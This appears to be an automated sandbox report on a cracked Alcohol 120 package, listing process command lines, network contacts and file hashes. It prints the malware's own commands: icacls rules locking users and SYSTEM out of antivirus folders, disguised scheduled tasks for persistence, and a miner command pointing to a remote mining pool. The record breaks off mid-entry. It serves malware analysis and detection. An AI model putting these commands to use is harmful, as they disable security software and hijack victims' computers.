C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

cmd /c C:\programdata\microsoft\temp\H.bat

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {38F7F940-E9B4-4AD3-A79E-72A1BEE3C7C4} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

C:\Windows\system32\gpupdate.exe

gpupdate /force

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u CPU --donate-level=1 -k -t4

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 23.63.101.153:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 taskhostw.com udp
RU 152.89.218.85:80 taskhostw.com tcp
RU 109.248.203.91:21 tcp
RU 109.248.203.91:21 tcp
RU 152.89.218.85:80 taskhostw.com tcp
RU 185.139.69.167:3333 tcp

Files

\ProgramData\Setup\update.exe

MD5 36aadfa2332dc7e5077455ae5cb423ef
SHA1 47cdc34d12f4820a005bba735caed72296d2400a
SHA256 2240022c8262345cf4f7280141f53fc6fcc29b5436cf72a03581906665b9dda9
SHA512 4dfaae0949f7c362221d14d3d080e8eaa5d7a2e43892aec653f1045c2044a0d24390704774748ab7d1252ba8f3dea5008970f1e0d879ce3b3dc190002db2f56c

C:\ProgramData\Setup\taskhost.exe

MD5 ebe2c898363c9e42908504bf053ad018
SHA1 9b02d448e534d6078f117db09c7ceca3c63e8ea5
SHA256 f034d58596cbb1023b31c891bce2b14207700fa27fd1d5836b177327c9755175
SHA512 c8d23c03869541cf6f2d108ab00b790286f95b23d729a7d44a3b0cf75ba497831b0c1cbc6860e0d51e2d49edb03a2a9c3ee0272a7cc679ffd4f963df03010b86

C:\Program Files\Common Files\System\iediagcmd.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\programdata\microsoft\temp\H.bat

MD5 ec45b066a80416bdb06b264b7efed90d
SHA1 6679ed15133f13573c1448b5b16a4d83485e8cc9
SHA256 cbb4167540edebdb3ac764114da3a2d5173b6ae351789640b15fd79e0f80659e
SHA512 0b8aa1084912c167b8eab066edd7823016dd0214fb0cf97ededad6c462169995942d286c918f296e87fb499f495081901643722bd2b5872d5668a220d08c4f2c

C:\ProgramData\RealtekHD\taskhostw.exe

MD5 53f8233b58b8e3ba3e92d82cca29f119
SHA1 ea7cae955f884aab7d048b6297fc0e472bb94a76
SHA256 a114d6bccc183021671bbb15426cf227ec487f2379094ed6f19e4211efd3ce65
SHA512 d1d4f385be4c8b8bdd16c8a8cc1fb75b6cee094ce69633724a4f53255dc560983097d26dc3b4d3e44a0eb718ac8ddb8d37c3b80f2c8747810f9c873ced558b23

C:\Users\Admin\AppData\Local\Temp\Cab5EF.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar7AB.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ef069807ffd69363e4722be8c064113
SHA1 88c11ca8e42aa6feba3bb9973ea05504cd9c2b02
SHA256 840ab194309422ec0bdf7845ac39b1764c044d641420b608291128cec10c1583
SHA512 76ce2760c4ed73c8eff9fc8414fffe95a83c12016011e0f9b2fd272cc0203b362e99e0f8e635d4debb6400970645355839e2c91892c234abed90dc08eb6651da

C:\Windows\System32\drivers\etc\hosts

MD5 78a6999aab837db409e9ab000a77a271
SHA1 a3f75992147f10e2f16257a59cf7979c85d144cc
SHA256 96e81b168383ac3d2d95528b4870d5099a4ce22e4dc0cba15ab65a7f5520c3ba
SHA512 179848931237b8b1e272d8a75ac638b44461b421abba54bff784ca6d71ec4407b2249323c548763a42f0921419a873d3fdb3e058ee416290f5a85b5dadb0387a

C:\ProgramData\RealtekHD\taskhost.exe

MD5 de88d7ec667dea756d236e9053d7eeb9
SHA1 ac6b619acece942f27d75e1e0ea46b94bc9b91a9
SHA256 7ce418c4a92d459b2a1971bd32ac4dfea3711393b1dce49d0c92d7124d71e157
SHA512 5c655def3bb5ab9c0255802e0c40667f16ef48f1042ff1c57e13199b38f0059cbff33517d6e940c39ca7d16d346830a92800e89058ae58ee02826472b0935942

C:\ProgramData\WindowsTask\winlogon.exe

MD5 ec0f9398d8017767f86a4d0e74225506
SHA1 720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256 870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512 d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

memory/2176-457-0x0000000000F90000-0x000000000107C000-memory.dmp

memory/2176-468-0x0000000000F90000-0x000000000107C000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 5ef47a9801b03d36f4e937e18de1f51b
SHA1 04212c27ba6858c54e6fad363f141fa52a8c4ad6
SHA256 a368d680dd1702b93ef730844ff4cc81f53ec68fa3bd753630e1a38576c08520
SHA512 99324ffef9517a8f9cc43ccc19065516d4038d826ac6b295880d6e33ac2f4834d04b69de1a9419cd55c7acf4d415e6e19b6eaf5f5de5f11e8de1bc82e5c81b24

C:\ProgramData\WindowsTask\OpenCL.DLL

MD5 12d6e576f527f671dfe0815de2902f36
SHA1 60a178947aef515367cc3489ce64b36332ecd78f
SHA256 7cc0d32b00f4596bf0a193f9929e6c628bc1b9354678327f59db0bd516a0dd6b
SHA512 c1b7c1669ec3b81249bb3ea50dfa41804470a21aa98e990d5f1656d7fa155bfc61a33f1113714ba741bbc0cdd710349ceb26b10f767c538a6d9c4cca661f562a

C:\ProgramData\WindowsTask\MicrosoftHost.exe

MD5 a74ad3584394b0766ada52191b245013
SHA1 6b25f4ba2c86541d4e2e5872a63fa1005373966b
SHA256 1e66a4b8154bf4559ec8745bee4130906e0dfeb3ea4992c7bb8d217d2b662737
SHA512 5976aa8dd83547613a1a2fff40e4c6ac0c4aff2eb55995e65c5d532768e714504be848a95f055512d1a044527e053ab81bf5c07725f6b7406a5c5c10b26e1be6

memory/2128-646-0x0000000000100000-0x0000000000110000-memory.dmp

C:\ProgramData\WindowsTask\WinRing0x64.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

131s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2308 wrote to memory of 1656 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-10.10.2014\msimg32.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3756,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3492 wrote to memory of 2912 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-21.04.2015\msimg32.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240221-en

Max time kernel

120s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe

"C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\tool uninstall Alcohol\sptdremov.exe"

Network

N/A

Files

memory/2232-0-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2232-1-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2232-2-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\CRACK\MSIMG32-19.11.2013\MSIMG32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 264

Network

N/A

Files

memory/1752-2-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-3-0x0000000000101000-0x0000000000102000-memory.dmp

memory/1752-4-0x0000000000100000-0x0000000000102000-memory.dmp

memory/1752-1-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-0-0x00000000000F0000-0x00000000000F2000-memory.dmp

memory/1752-5-0x0000000000101000-0x0000000000102000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-01 03:28

Reported

2024-06-01 03:31

Platform

win7-20240419-en

Max time kernel

119s

Max time network

121s

Command Line

